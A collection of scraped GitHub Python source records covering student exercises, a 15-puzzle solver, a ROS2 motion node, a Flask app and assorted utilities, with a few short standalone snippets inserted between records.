int(input(\"Side 1?\"))\nb = int(input(\"Side 2?\"))\nc = int(input(\"Side 3?\"))\n\nif pytTrip(a,b,c):\n print(\"Huzzah! Dette er et Pytagoreisk trippel.\")\n\nelse:\n print(\"NOPE. 
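# Usage sketch for the sample graphs above: graph1 overrides
# Draw_Networkx_Graph but, unlike the base class version, never calls
# plt.show(), so the caller has to (assumes a working matplotlib backend):
import matplotlib.pyplot as plt

g = graph1()
g.Get_Networkx_Graph()   # builds the nx.Graph lazily on first call
g.Draw_Networkx_Graph()  # colors nodes A-D red, E-H blue, I-J grey
plt.show()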
Dette er et ikke et Pytagoreisk trippel.\")\n","repo_name":"newboarg/ProgModX-20-21","sub_path":"LF_ov2_oppg3.py","file_name":"LF_ov2_oppg3.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"da","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23254497104","text":"'''\r\nCreated on 25 Nov 2017\r\n\r\n@author: RCLEGG2@BLOOMBERG.NET\r\n\r\n'''\r\nimport logging\r\nfrom dataset import DataSet\r\nfrom ruleset import RuleSet\r\nfrom action import Action\r\n\r\nclass RuleMSX:\r\n \r\n def __init__(self,lvl=logging.CRITICAL):\r\n self.setLogLevel(lvl)\r\n #logging.logger = logging.getLogger(__name__)\r\n\r\n logging.info(\"Initializing sets\")\r\n \r\n self.ruleSets = {}\r\n self.dataSets = {}\r\n self.actions = {}\r\n \r\n def setLogLevel(self,lvl):\r\n logging.basicConfig(level=lvl)\r\n\r\n def createDataSet(self,name):\r\n \r\n logging.info(\"Creating DataSet: \" + name)\r\n\r\n if(name is None or name == \"\"):\r\n raise ValueError(\"DataSet name cannot be none or empty\")\r\n \r\n ds = DataSet(name)\r\n self.dataSets[name] = ds\r\n\r\n logging.info(\"Created DataSet: \" + name)\r\n \r\n return ds\r\n\r\n \r\n \r\n def createRuleSet(self,name):\r\n \r\n logging.info(\"Creating RuleSet: \" + name)\r\n\r\n if(name is None or name == \"\"):\r\n raise ValueError(\"RuleSet name cannot be none or empty\")\r\n \r\n rs = RuleSet(name)\r\n self.ruleSets[name] = rs\r\n\r\n logging.info(\"Created RuleSet: \" + name)\r\n \r\n return rs\r\n\r\n \r\n def createAction(self,name, executor):\r\n \r\n logging.info(\"Creating Action: \" + name)\r\n \r\n if(name is None or name == \"\"):\r\n raise ValueError(\"Action name cannot be none or empty\")\r\n \r\n a = Action(name,executor)\r\n self.actions[name] = a\r\n\r\n logging.info(\"Created Action: \" + name)\r\n\r\n return a\r\n \r\n \r\n def stop(self):\r\n \r\n logging.info(\"Stopping RuleMSX\")\r\n \r\n result = True\r\n \r\n for rs in self.ruleSets.values():\r\n if not rs.stop(): result = False\r\n \r\n logging.info(\"Stopped RuleMSX\")\r\n\r\n return result\r\n \r\n__copyright__ = \"\"\"\r\nCopyright 2017. Bloomberg Finance L.P.\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to\r\ndeal in the Software without restriction, including without limitation the\r\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\r\nsell copies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions: The above\r\ncopyright notice and this permission notice shall be included in all copies\r\nor substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
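# Quick check of pytTrip above: sorting the sides first means the hypotenuse
# can be passed in any position.
print(pytTrip(3, 4, 5))  # True
print(pytTrip(5, 3, 4))  # True  (argument order is irrelevant)
print(pytTrip(2, 3, 4))  # False (4 + 9 != 16)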
IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\r\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\r\nIN THE SOFTWARE.\r\n\"\"\"\r\n","repo_name":"rikclegg/old_py_RuleMSX","sub_path":"rulemsx.py","file_name":"rulemsx.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17330323554","text":"# -*- coding: utf-8 -*-\nwhile True:\n n = input()\n if n == \"*\":\n break\n n = n.split()\n s = 0\n for i in range(len(n)-1):\n if n[i][:1].upper() == n[i+1][:1].upper():\n s = 1\n else:\n s = 0\n if s == 0:\n print(\"N\")\n else:\n print(\"Y\")\n","repo_name":"ThiagoCComelli/URI-Online-Judge","sub_path":"URI-py/1140.py","file_name":"1140.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19893266781","text":"#-*-coding:utf-8-*-\n'''\nauthor:zhanglianzhong\ndate:20190907\n'''\n\nimport os\nimport pandas as pd\n\ndef get_item_info(input_file):\n '''\n get item info\n Args:\n input_file: input file path\n return: a dict. key itemId,value [title,genres]\n '''\n if not os.path.exists(input_file):\n return {}\n df = pd.read_csv(input_file)\n result = {}\n for index,line in df.iterrows():\n if len(line)<3:\n continue\n [itemId,title,genres] = line\n itemId = float(itemId)\n if itemId not in result.keys():\n result[itemId]=[title,genres]\n\n return result\n\n\n\ndef get_average_score(input_file):\n '''\n get every item average score\n Args:\n input_file: input file path\n return: a dict. key itemId,value average score.\n '''\n record_dict = {}\n average_score ={}\n if not os.path.exists(input_file):\n return {}\n df = pd.read_csv(input_file)\n for index,line in df.iterrows():\n movieId = line['movieId']\n if movieId not in record_dict.keys():\n record_dict[movieId]=[0,0]\n record_dict[movieId][0] +=1\n record_dict[movieId][1] +=line['rating']\n\n for movieId in record_dict:\n average_score[movieId]=round(record_dict[movieId][1]/record_dict[movieId][0],3)\n\n return average_score\n\n\ndef get_train_data(input_file):\n '''\n get train data\n Args:\n input_file: ratings file path\n return: a list [(userid,itemid,lable),(, ,)]\n '''\n if not os.path.exists(input_file):\n return []\n neg_dict = {}\n pos_dict = {}\n threshold = 4\n train_data =[]\n average_score = get_average_score(input_file)\n ratings_data = pd.read_csv(input_file)\n for index,line in ratings_data.iterrows():\n userid,itemid,rating = line['userId'],line['movieId'],line['rating']\n if userid not in pos_dict:\n pos_dict[userid] =[]\n if userid not in neg_dict:\n neg_dict[userid] =[]\n #如果大于阈值,给lable 1。否则,给0,这里存储的是平均分\n if rating >= threshold:\n pos_dict[userid].append((itemid,1))\n else:\n score = average_score[itemid]\n neg_dict[userid].append((itemid,score))\n\n #正负样本均衡和负采样\n for userid in pos_dict:\n data_num = min(len(pos_dict[userid]),len(neg_dict[userid]))\n if data_num > 0:\n train_data += [(userid,zuhe[0],zuhe[1]) for zuhe in pos_dict[userid][0:data_num]]\n else:\n continue\n sorted_neg_list = sorted(neg_dict[userid],key=lambda element:element[1],reverse=True)[0:data_num]\n train_data += [(userid,zuhe[0],0 ) for zuhe in sorted_neg_list]\n\n return train_data\n\n\n\n\n\n\n\nif __name__ == '__main__':\n movies_file ='../data/ml-latest-small/movies.csv'\n ratings_file 
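# In 1140.py above, s is overwritten on every iteration, so only the last
# adjacent pair of words decides the answer; "Apple banana Banana" would
# wrongly print Y. A corrected sketch that requires every initial to match:
def is_tautogram(words):
    initials = [w[0].upper() for w in words]
    return all(c == initials[0] for c in initials)

print('Y' if is_tautogram('Flowers Flourish from France'.split()) else 'N')  # Y
print('Y' if is_tautogram('Apple banana Cherry'.split()) else 'N')           # N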
='../data/ml-latest-small/ratings.csv'\n    item_info = get_item_info(movies_file)\n    average_score = get_average_score(ratings_file)\n    print(item_info[1])\n    print(average_score[1])\n    data_train = get_train_data(ratings_file)\n    print(data_train[2])\n\n","repo_name":"zhanglianzhong/Recommendation","sub_path":"LFM/util/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"20021318772","text":"from collections import defaultdict\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nnames = defaultdict(bool)\nfor i in range(n):\n    data = input().strip().split()\n    if data[1] == 'enter':\n        names[data[0]] = True\n    elif data[1] == 'leave':\n        names[data[0]] = False\n\nfor name, res in sorted(names.items(), key=lambda x: x[0], reverse=True):\n    if res:\n        print(name)","repo_name":"Dltmd202/BOJ-ProblemSlove","sub_path":"python/7785/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"17295627849","text":"import copy\nfrom time import perf_counter_ns\n\n# Function taking the puzzle matrix and returning a boolean: whether the puzzle can be solved or not\n# This function also prints the Kurang(i) values and the value of Sigma(Kurang(i))+X\ndef ReachableGoal(a) :\n    kurang = [0 for i in range (16)]\n    for i in range (16) :\n        if (a[i] == \"X\") :\n            idxEmp = i\n            temp = 16\n        else :\n            temp = int(a[i])\n        for j in range (i+1, 16) :\n            if(a[j] == \"X\"):\n                temp2 = 16\n            else :\n                temp2 = int(a[j])\n            if(temp > temp2) :\n                kurang[temp-1] += 1\n    for i in range (16) :\n        print(\"Kurang (\"+ str(i+1)+ \") =\", kurang[i])\n    print()\n    if ((idxEmp+1)%2 == ((idxEmp)//4+1)%2) :\n        print(\"Value of Sigma(Kurang(i))+X =\", sum(kurang))\n        print()\n        return (sum(kurang)%2 == 0)\n    else :\n        print(\"Value of Sigma(Kurang(i))+X =\", (sum(kurang)+1))\n        print()\n        return ((sum(kurang)+1)%2 == 0)\n\n# Function taking the puzzle matrix and printing the puzzle to the screen\ndef PrintPuzzle(a) :\n    for i in range (4) :\n        for j in range (4) :\n            print(a[i][j], end=\" \")\n        print()\n\n# Function taking the puzzle matrix and returning the position of X (the empty tile), with values from 1 to 16\ndef LocX(a) :\n    for i in range (4) :\n        for j in range (4) :\n            if (a[i][j] == \"X\") :\n                return (i*4)+j+1\n\n# Function taking the puzzle matrix and a direction char dir, returning a boolean: whether the empty tile can slide in direction dir\ndef IsMoveToAvailable(a, dir) :\n    locX = LocX(a)\n    if (dir == \"L\") :\n        if (locX == 1 or locX == 5 or locX == 9 or locX == 13) :\n            return False\n        else :\n            return True\n    elif (dir == \"R\") :\n        if (locX == 4 or locX == 8 or locX == 12 or locX == 16) :\n            return False\n        else :\n            return True\n    elif (dir == \"U\") :\n        if (locX > 0 and locX < 5) :\n            return False\n        else :\n            return True\n    elif (dir == \"D\") :\n        if (locX > 12 and locX < 17) :\n            return False\n        else :\n            return True\n\n# Function taking the puzzle matrix and a direction char dir, returning the puzzle matrix after the empty tile slides in direction dir\ndef MoveTo(a, dir) :\n    b = copy.deepcopy(a)\n    RowX = (LocX(a)-1)//4\n    ColX = (LocX(a)-1)-(RowX*4)\n    if (dir == \"L\") :\n        b[RowX][ColX], b[RowX][ColX-1] = b[RowX][ColX-1], b[RowX][ColX]\n    elif (dir == \"R\") :\n        b[RowX][ColX], b[RowX][ColX+1] = b[RowX][ColX+1], b[RowX][ColX]\n    elif (dir == \"U\") :\n        b[RowX][ColX], b[RowX-1][ColX] = b[RowX-1][ColX], b[RowX][ColX]\n
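# The four boundary checks in IsMoveToAvailable above reduce to arithmetic on
# the empty tile's 0-based row and column (hypothetical equivalent sketch):
def can_move(loc_x, direction):
    row, col = (loc_x - 1) // 4, (loc_x - 1) % 4
    return {'L': col > 0, 'R': col < 3, 'U': row > 0, 'D': row < 3}[direction]

print(can_move(1, 'L'), can_move(1, 'U'))  # False False (top-left corner)
print(can_move(6, 'R'))                    # True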
    elif (dir == \"D\") :\n        b[RowX][ColX], b[RowX+1][ColX] = b[RowX+1][ColX], b[RowX][ColX]\n    return b\n\n# Function taking a matrix and returning the number of non-empty tiles that are not in their final position\ndef nUbinNotFinal(a):\n    temp = \"1\"\n    count = 0\n    for i in range (4) :\n        for j in range (4) :\n            if (temp != a[i][j] and a[i][j] != \"X\") :\n                count += 1\n            temp = str((i*4)+j+2)\n    return count\n\n# Function taking the puzzle matrix and an int depth, returning the cost of node a at depth depth\ndef Cost(a, depth) :\n    return nUbinNotFinal(a)+depth\n\n####################################################################################################\n# MAIN PROGRAM\npzl = [0 for i in range (16)]\nnamaFile = input(\"Enter the puzzle file name: \")\nprint()\nprint(\"Puzzle to be solved : \")\nfile = open(namaFile, \"r\")\nfor i in range (4) :\n    strLine = file.readline().replace('\\n', '').replace('\\r', '')\n    pzl[i*4], pzl[i*4+1], pzl[i*4+2], pzl[i*4+3] = strLine.split(\" \")\n    print(pzl[i*4], pzl[i*4+1], pzl[i*4+2], pzl[i*4+3])\nprint()\ntimeStart = perf_counter_ns()\ncountNode = 0\nif (not ReachableGoal(pzl)) :\n    print(\"The puzzle cannot be solved\")\nelse :\n    puzzle = [[0 for i in range (4)] for j in range (4)]\n    for i in range (4) :\n        for j in range (4) :\n            puzzle[i][j] = pzl[i*4+j]\n    if (nUbinNotFinal(puzzle) == 0) :\n        print(\"This puzzle is already in its final arrangement! :\")\n        PrintPuzzle(puzzle)\n    else :\n        print(\"Puzzle solution sequence :\")\n        queue = []\n        tplCostPzl = (Cost(puzzle, 0), puzzle, \"Root\", 0)\n        queue.append(tplCostPzl)\n        goal = False\n        while (not goal) :\n            temp = min(queue)\n            if (nUbinNotFinal(temp[1]) == 0) :\n                PrintPuzzle(temp[1])\n                queue.remove(temp)\n                goal = True\n            else :\n                PrintPuzzle(temp[1])\n                depth = temp[3]+1\n                if (IsMoveToAvailable(temp[1], \"L\") and temp[2] != \"R\") :\n                    tempPzl = MoveTo(temp[1], \"L\")\n                    tplCostPzl = (Cost(tempPzl, depth), tempPzl, \"L\", depth)\n                    queue.append(tplCostPzl)\n                    countNode += 1\n                if (IsMoveToAvailable(temp[1], \"R\") and temp[2] != \"L\") :\n                    tempPzl = MoveTo(temp[1], \"R\")\n                    tplCostPzl = (Cost(tempPzl, depth), tempPzl, \"R\", depth)\n                    queue.append(tplCostPzl)\n                    countNode += 1\n                if (IsMoveToAvailable(temp[1], \"U\") and temp[2] != \"D\") :\n                    tempPzl = MoveTo(temp[1], \"U\")\n                    tplCostPzl = (Cost(tempPzl, depth), tempPzl, \"U\", depth)\n                    queue.append(tplCostPzl)\n                    countNode += 1\n                if (IsMoveToAvailable(temp[1], \"D\") and temp[2] != \"U\") :\n                    tempPzl = MoveTo(temp[1], \"D\")\n                    tplCostPzl = (Cost(tempPzl, depth), tempPzl, \"D\", depth)\n                    queue.append(tplCostPzl)\n                    countNode += 1\n                queue.remove(temp)\n                print(\" -> \")\nprint()\ntimeEnd = perf_counter_ns()\nprint(\"Execution time :\", (timeEnd-timeStart)/pow(10,6), \"milliseconds\")\nprint()\nprint(\"Number of nodes generated :\", countNode)","repo_name":"sfa119f/Tucil3StrAlgo-13518095","sub_path":"src/15-Puzzle-Solver.py","file_name":"15-Puzzle-Solver.py","file_ext":"py","file_size_in_byte":6133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"74493025744","text":"def falling(n, k):\n    \"\"\"Compute the falling factorial of n to depth k.\n\n    >>> falling(6, 3) # 6 * 5 * 4\n    120\n    >>> falling(4, 3) # 4 * 3 * 2\n    24\n    >>> falling(4, 1) # 4\n    4\n    >>> falling(4, 0)\n    1\n    \"\"\"\n    \"*** YOUR CODE HERE ***\"\n    ans = 1\n    while (k) :\n        ans *= n\n        n -= 1\n        k -= 1\n    return ans\n\ndef sum_digits(y):\n    \"\"\"Sum all the digits 
of y.\n\n >>> sum_digits(10) # 1 + 0 = 1\n 1\n >>> sum_digits(4224) # 4 + 2 + 2 + 4 = 12\n 12\n >>> sum_digits(1234567890)\n 45\n >>> a = sum_digits(123) # make sure that you are using return rather than print\n >>> a\n 6\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n sum = 0\n while (y > 0) :\n t = y % 10\n sum += t\n y //= 10\n return sum\n\ndef double_eights(n):\n \"\"\"Return true if n has two eights in a row.\n >>> double_eights(8)\n False\n >>> double_eights(88)\n True\n >>> double_eights(2882)\n True\n >>> double_eights(880088)\n True\n >>> double_eights(12345)\n False\n >>> double_eights(80808080)\n False\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n s = str(n)\n for i in range (1, len(s)) :\n a, b = s[i], s[i - 1];\n if (a == '8' and b == '8') :\n return True\n return False\n\n","repo_name":"tsrigo/CS61A_su","sub_path":"Lab/lab01/lab01.py","file_name":"lab01.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11396622023","text":"'''\n# 반복문 : while 조건\n조건이 참이면 수행 거짓이면 탈출 \n\ncontinue\nbreak\n\n겹치지만 않으면 블럭이 블럭을 포함할 수 있다\n'''\na = 1\n\nwhile a <= 5:\n print(a, end = ' ') # 1 2 3 4 5\n a = a + 1\n # break\n \nprint('while 종료')\n\nprint()\nprint('while 블럭안에 while')\ni = 1\nwhile i <= 3:\n j = 1\n while j <= 4:\n print('i:' + str(i) + ', j:' + str(j))\n j += 1\n i += 1\n\nprint('\\nwhile 종료2')\n\nprint()\nprint('1 ~ 100 사이의 정수 중 3의 배수의 합')\ni = 1; hap = 0\nwhile i <= 100:\n # print(i, end = ' ') # 1 ~ 100까지\n if i % 3 == 0:\n # print(i, end = ' ') # 3의 배수 ~ 100까지\n hap += i\n i += 1\n \nprint('합은 ', hap) # 합은 1683\n \nprint()\ncolors = ['r', 'g', 'b']\nprint(len(colors)) # 3\na = 0\nwhile a < len(colors):\n print(colors[a], end = ':') # r:g:b:\n a += 1\n \nprint()\nwhile colors:\n print(colors.pop()) # pop은 추출\n \nprint(len(colors))\n\nprint()\nprint('*찍기')\ni = 1\nwhile i <= 10:\n j = 1\n res = ''\n while j <= i:\n res = res + '*'\n j += 1\n print(res)\n i += 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shinbumjun/Python","sub_path":"pypro1/pack1/test06_while.py","file_name":"test06_while.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1267133672","text":"from functools import partial\n\nimport rclpy\nfrom rclpy.node import Node\n\nimport std_msgs.msg\nimport sensor_msgs.msg\nimport geometry_msgs.msg\n\nd = None\ndef publish_twist(pub):\n if d is None:\n return\n\n twist = geometry_msgs.msg.Twist()\n\n print(d)\n\n if d == 'turn left':\n twist.linear.x = 0.1\n twist.angular.z = 0.15\n elif d == 'turn right':\n twist.linear.x = 0.1\n twist.angular.z = -0.15\n elif d == 'go straight':\n twist.linear.x = 0.15\n twist.angular.z = 0.0\n elif d == 'search':\n twist.linear.x = 0.0\n twist.angular.z = 0.25\n else:\n print(\"bad direction {}\".format(d), file=sys.stderr)\n\n pub.publish(twist)\n\ndef main(args=None):\n rclpy.init(args=args)\n\n node = Node('motion_node')\n\n def on_direction_received(msg):\n global d\n d = msg.data\n\n vel_pub = node.create_publisher(\n geometry_msgs.msg.Twist,\n '/cmd_vel',\n 10)\n\n image_sub = node.create_subscription(\n std_msgs.msg.String,\n '/direction',\n on_direction_received,\n 10)\n\n timer = node.create_timer(0.1, partial(publish_twist, vel_pub))\n \n rclpy.spin(node)\n\n node.destroy_node()\n rclpy.shutdown()\n\nif __name__ == '__main__':\n 
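# The if/elif direction mapping in publish_twist above condenses to a lookup
# table (sketch; the velocity values are copied from the branches):
TWIST_TABLE = {
    'turn left':   (0.1,  0.15),
    'turn right':  (0.1, -0.15),
    'go straight': (0.15, 0.0),
    'search':      (0.0,  0.25),
}
linear_x, angular_z = TWIST_TABLE.get('turn left', (0.0, 0.0))
print(linear_x, angular_z)  # 0.1 0.15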
main()\n","repo_name":"miuele/line_follower_turtlebot_ros2","sub_path":"src/motion_node.py","file_name":"motion_node.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42164833811","text":"#!/usr/bin/python3\n\"\"\"Deal with json.\"\"\"\nimport json\n\n\ndef save_to_json_file(myobj, filename):\n \"\"\"Save to a json file.\n\n @param myobj: the file to add to the file.\n @param filename: name of the file.\n \"\"\"\n new_str = json.dumps(myobj)\n with open(filename, 'w') as new_file:\n new_file.write(new_str)\n","repo_name":"Juli868/alx-higher_level_programming","sub_path":"0x0B-python-input_output/5-save_to_json_file.py","file_name":"5-save_to_json_file.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4544761475","text":"from unittest.mock import patch\n\nfrom django.test import Client\n\nfrom blossom.api.models import Source\nfrom blossom.api.slack.transcription_check.messages import (\n _construct_transcription_check_text,\n)\nfrom blossom.utils.test_helpers import (\n create_check,\n create_submission,\n create_transcription,\n create_user,\n setup_user_client,\n)\n\n\ndef test_construct_transcription_check_text(client: Client) -> None:\n \"\"\"Test that the fallback text is generated correctly.\"\"\"\n client, _headers, user = setup_user_client(client, id=100, username=\"Userson\")\n mod = create_user(id=200, username=\"Moddington\")\n submission = create_submission(\n claimed_by=user,\n completed_by=user,\n # Allow long line for URL\n # flake8: noqa: E501\n url=\"https://www.reddit.com/r/CuratedTumblr/comments/tirg5d/surviving_a_sitcom_death_mention/\",\n source=Source(name=\"reddit\"),\n )\n transcription = create_transcription(submission=submission, user=user)\n check = create_check(transcription, moderator=mod, trigger=\"Watched (100.0%)\")\n\n expected = \"Check for u/Userson (21 Γ) on r/CuratedTumblr | Watched (100.0%)\"\n\n with patch(\"blossom.authentication.models.BlossomUser.gamma_at_time\", return_value=21):\n actual = _construct_transcription_check_text(check)\n\n assert actual == expected\n","repo_name":"GrafeasGroup/blossom","sub_path":"blossom/api/tests/slack/transcription_check/test_messages.py","file_name":"test_messages.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"20021318772","text":"'''\nCreated on Jun 16, 2010\n\n@author: sushil\n'''\n\nimport cv\nfrom MergeImages import MergeImages\nfrom opencv.cv import cvZero, cvInvert\n\nclass AddSpace:\n \n def __init__(self):\n ''\n \n def addWhiteSpace(self,lineImg,positionList,width):\n mergedImage=lineImg\n splitImage=list()\n mergeImages=MergeImages()\n index=0\n positionList.append(positionList[-1]);\n for position in positionList:\n if(index==0):\n startpos=0\n else:\n startpos=positionList[index-1]\n \n #print position,\"-\",startpos,\" \",position-startpos\n \n tempImg=cv.CreateImage((position-startpos,lineImg.height), lineImg.depth, lineImg.nChannels)\n whiteSpace=cv.CreateImage((width,lineImg.height), lineImg.depth, lineImg.nChannels)\n cv.Set(whiteSpace,255)\n #create new image variable\n\n cv.SetImageROI(lineImg, (startpos,0,position-startpos,lineImg.height)) #startpos, startpos, width, height\n #print cv.GetImageROI(lineImg)\n #print \"ht=\",tempImg.height\n #print \"wd=\",tempImg.width\n \n #copy 
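# addWhiteSpace above crops each segment with the legacy cv SetImageROI/Copy
# pair; with the modern cv2/numpy interface the same crop-and-pad is plain
# array slicing (a sketch, not the author's code):
import numpy as np

def add_white_space(line_img, positions, width):
    # line_img: HxWxC uint8 array; positions: cut columns as in addWhiteSpace
    gap = np.full((line_img.shape[0], width, line_img.shape[2]), 255, np.uint8)
    pieces, start = [], 0
    for pos in positions:
        pieces += [line_img[:, start:pos], gap]
        start = pos
    return np.hstack(pieces)  # horizontal merge, as MergeImages does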
roi in that new image variable\n cv.Copy(lineImg, tempImg)\n \n splitImage.append(tempImg)\n splitImage.append(whiteSpace)\n cv.ResetImageROI(lineImg)\n index=index+1\n cv.ShowImage(\"SPLIT\", splitImage[0])\n merged=mergeImages.mergeHorizontally(splitImage);\n return merged","repo_name":"sushilman/Nepali_OCR","sub_path":"AddSpace.py","file_name":"AddSpace.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"34316258530","text":"#!/usr/bin/env python3\n\n# export FLASK_ENV=development\n# export FLASK_APP=main.py\n#\t flask run\n\nfrom flask import Flask, render_template\napp = Flask(__name__)\n\nimport os\nimport base64\nimport yaml\nfrom github import Github\n\n\n@app.route('/')\ndef home():\n\n\t# Github setup\n\ttoken = os.environ['GITHUB_TOKEN']\n\tg = Github(token)\n\n\trepo = g.get_repo(\"alphagov/gsp-teams\")\n\tcontents = repo.get_contents(\"clusters\")\n\n\tclusters = []\n\n\tfor file in contents:\n\t\tdecoded = base64.b64decode(file.content)\n\t\tyamled = yaml.safe_load(decoded)\n\t\tclusters.append(yamled)\n\n\treturn render_template('home.html', clusters=clusters)\n\n\n# This is if a separate details page is required\n\n# @app.route('/')\n# def show_cluster_info(clustername):\n#\n# \t# Github setup\n# \ttoken = os.environ['GITHUB_TOKEN']\n# \tg = Github(token)\n#\n# \trepo = g.get_repo(\"alphagov/gsp-teams\")\n# \tfile = repo.get_contents(\"clusters/\" + clustername + \".yaml\")\n# \tdecoded = base64.b64decode(file.content)\n# \tcluster = yaml.safe_load(decoded)\n#\n# \treturn render_template('detail.html', cluster=cluster)\n","repo_name":"Digitiain/inspect-gsp-clusters","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72078785427","text":"from variables import *\nimport pickle\nimport copy\n\n\nconfig = {\n 'DICE ROLL': 'VIRTUAL',\n 'ROLLS ALWAYS': 'ASK',\n 'ATTACK ALWAYS': 'ASK',\n 'SKILL CHECK ALWAYS': 'ASK',\n}\n\n\ndef choose_equipment(equipment_options, number_elements=1):\n \"\"\"\n It loops through the list of possible equipments, given, for each possible\n choice of it, the possibility to the user to select the one desired.\n :param equipment_options: A list containing the possible choices for the\n user. 
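# main.py above decodes each GitHub file with base64 + yaml by hand; PyGithub's
# decoded_content property performs the base64 step itself (sketch, assumes
# GITHUB_TOKEN is set, as in the original):
import os
import yaml
from github import Github

repo = Github(os.environ['GITHUB_TOKEN']).get_repo('alphagov/gsp-teams')
clusters = [yaml.safe_load(f.decoded_content) for f in repo.get_contents('clusters')]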
Every choice that it has is a list inside of it, if there is a hard\n group inside of it, it must be in a tuple, if the tuple is only one element\n it must be created by the keyword tuple().\n :param number_elements: Number of the elements that will be chosen\n :return: List of equipments chosen by the user.\n \"\"\"\n copy_list = copy.deepcopy(equipment_options)\n already_chosen = []\n last_chosen = None\n equipments = []\n\n for _ in range(number_elements):\n error = False\n item_number = 0\n choice = None\n\n try:\n choice = copy_list[item_number]\n except IndexError:\n error = True\n\n while not error:\n if ['GO BACK', 'EXIT'] not in choice:\n choice.append(['GO BACK', 'EXIT'])\n chosen = None\n valid_choice = False\n group_number = 1\n groups = {}\n text = ''\n\n # Tuples represent a group of more than one object that must be\n # chose together, so it prints all of them with only one number\n if tuple_inside_list(choice):\n tuples = []\n no_tuples = []\n\n for group in choice:\n if isinstance(group, tuple):\n tuples.append(group)\n else:\n no_tuples += list_with_no_list_or_dict(group)\n\n no_tuples = [no_tuples]\n choice = tuples + no_tuples\n\n text += 'You have to chose between:\\n'\n for group in choice:\n if isinstance(group, tuple):\n pack_name = None\n groups[str(group_number)] = group\n\n group_item_names = []\n for item in group:\n group_item_names.append(item.name)\n\n for pack, items in packs.items():\n is_pack = True\n for item in items:\n if item.name not in group_item_names:\n is_pack = False\n\n if is_pack:\n pack_name = pack\n\n if pack_name is not None:\n text += (\n f'Or group {group_number} '\n f'({pack_name.title()}):\\n')\n else:\n text += f'Or group {group_number}:\\n'\n elements = {}\n for element in group:\n if element not in elements:\n elements[element] = 1\n else:\n elements[element] += 1\n\n for element, units in elements.items():\n text += f'- {element.name.title()} x{units}\\n'\n\n group_number += 1\n\n else:\n text += 'Or any of these:\\n'\n for item in group:\n if type(item) is not str:\n text += (f'({group_number}) '\n f'{item.name.title()}\\n')\n else:\n text += f'({group_number}) {item.title()}\\n'\n\n groups[str(group_number)] = item\n group_number += 1\n text += '\\n'\n # When there's no tuple, every element's a possible choice alone\n else:\n choice = list_with_no_list_or_dict(choice)\n text += 'Choose one of the following options:\\n'\n\n for item in choice:\n if type(item) is not str:\n if item.name != 'UNARMED ATTACK':\n text += f'({group_number})' \\\n f' {item.name.title()}\\n'\n else:\n text += f'({group_number}) {item.title()}\\n'\n\n groups[str(group_number)] = item\n group_number += 1\n\n # Asks and checks the value given by the user\n choice = list_with_no_list_or_dict(choice)\n while not valid_choice:\n if len(equipments) != 0:\n elements = {}\n for element in equipments:\n if element not in elements:\n elements[element] = 1\n else:\n elements[element] += 1\n\n print(f'You have chosen so far:')\n\n for item, units in elements.items():\n print(f'- {item.name.title()} x{units}')\n\n print('')\n\n print(text)\n chosen = input('Type the number of the chosen one: ')\n\n if chosen.isnumeric() and chosen in groups:\n valid_choice = True\n\n if groups[chosen] != 'EXIT' \\\n and groups[chosen] != 'GO BACK':\n item_number += 1\n chosen = groups[chosen]\n choice.remove(chosen)\n\n elif groups[chosen] == 'GO BACK':\n if len(equipments) > 0:\n item_number -= 1\n if isinstance(last_chosen, list):\n for item in last_chosen:\n equipments.remove(item)\n 
